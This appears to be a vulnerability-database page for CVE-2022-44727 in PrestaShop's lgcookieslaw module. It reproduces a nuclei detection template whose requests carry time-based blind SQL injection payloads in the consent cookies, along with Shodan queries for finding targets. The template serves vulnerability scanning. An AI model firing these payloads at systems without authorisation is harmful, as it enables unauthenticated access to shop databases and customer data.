PrestaShop lgcookieslaw - SQL Injection

Reported by ProjectDiscovery, 04 Jul 2026 03:00:48
Type: nuclei
Source: github.com

PrestaShop lgcookieslaw SQL injection (CVE-2022-44727) allows unauthenticated DB access via cookies.

Related

Reporter | Title | Published | Family
Circl | CVE-2022-44727 | 13 Nov 2022 05:49 | circl
CNNVD | PrestaShop SQL injection vulnerability | 10 Nov 2022 00:00 | cnnvd
CVE | CVE-2022-44727 | 10 Nov 2022 00:00 | cve
Cvelist | CVE-2022-44727 | 10 Nov 2022 00:00 | cvelist
EUVD | EUVD-2022-47661 | 3 Oct 2025 20:07 | euvd
NVD | CVE-2022-44727 | 10 Nov 2022 17:15 | nvd
OSV | CVE-2022-44727 | 10 Nov 2022 17:15 | osv
Prion | Sql injection | 10 Nov 2022 17:15 | prion
Positive Technologies | PT-2022-27286 · Prestashop · Eu Cookie Law Gdpr | 10 Nov 2022 00:00 | ptsecurity
RedhatCVE | CVE-2022-44727 | 23 May 2025 00:15 | redhatcve

Code

id: CVE-2022-44727

info:
  name: PrestaShop lgcookieslaw - SQL Injection
  author: mastercho
  severity: critical
  description: |
    The EU Cookie Law GDPR (Banner + Blocker) PrestaShop module before 2.1.3 allows blind SQL injection via the __lglaw or lgcookieslaw cookie used to store user consent choices.
  impact: |
    Successful exploitation allows unauthenticated attackers to read or modify the shop database, including customer PII and payment-related data.
  remediation: |
    Upgrade the lgcookieslaw module to version 2.1.3 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44727
    - https://security.friendsofpresta.org/modules/2022/11/06/lgcookieslaw.html
    - https://web.archive.org/web/2/https://securityandstuff.com/posts/cve-2022-44727/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44727
    epss-score: 0.02397
    epss-percentile: 0.81984
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
    vendor: lineagrafica
    product: eu_cookie_law_gdpr
    framework: prestashop
    shodan-query:
      - http.component:"Prestashop"
      - http.component:"prestashop"
  tags: cve,cve2022,prestashop,prestashop-module,sqli,time-based-sqli,lgcookieslaw,unauth

variables:
  rand_num: "{{rand_int(1000,9999)}}"
  lglaw_v1: "2,3,4,5) AND (SELECT {{rand_num}} FROM (SELECT(SLEEP(10)))vkBH) AND (9297=9297"
  lglaw_v2_json: "{\"lgcookieslaw_accepted_purposes\":\"[\\\"1\\\",\\\"2\\\",\\\"3\\\",\\\"4\\\",\\\"5) AND (SELECT {{rand_num}} FROM (SELECT(SLEEP(10)))vkBH) AND (9297=9297\\\"]\"}"
  lglaw_v2: "{{base64(lglaw_v2_json)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /modules/lgcookieslaw/views/css/front.css HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /modules/lgcookieslaw/views/js/front.js HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(tolower(body), 'lgcookieslaw')
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}
        Cookie: __lglaw={{lglaw_v1}}

      - |
        @timeout: 20s
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}
        Cookie: lgcookieslaw={{lglaw_v2}}

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        name: lglaw-v1-sqli
        dsl:
          - duration_1 >= 10
          - status_code_1 == 200
        condition: and
      - type: dsl
        name: lglaw-v2-sqli
        dsl:
          - duration_2 >= 10
          - status_code_2 == 200
        condition: and
# digest: 4a0a0047304502207aa8c3bad45d3765e82589fb4f7109dce1f8b83e0e10f87dc4631cfe0003fe5a0221008554cbfadb94b77aac5b9afbbcc2bd1153b5c2b5ae257b4d5fbe325b44852ad8:922c64590222798bb761d5b6d8e72950


Scores (current as of 24 May 2026 21:41)
Vulners AI Score: 7.2 (High risk)
CVSS 3.1: 9.1
EPSS: 0.02397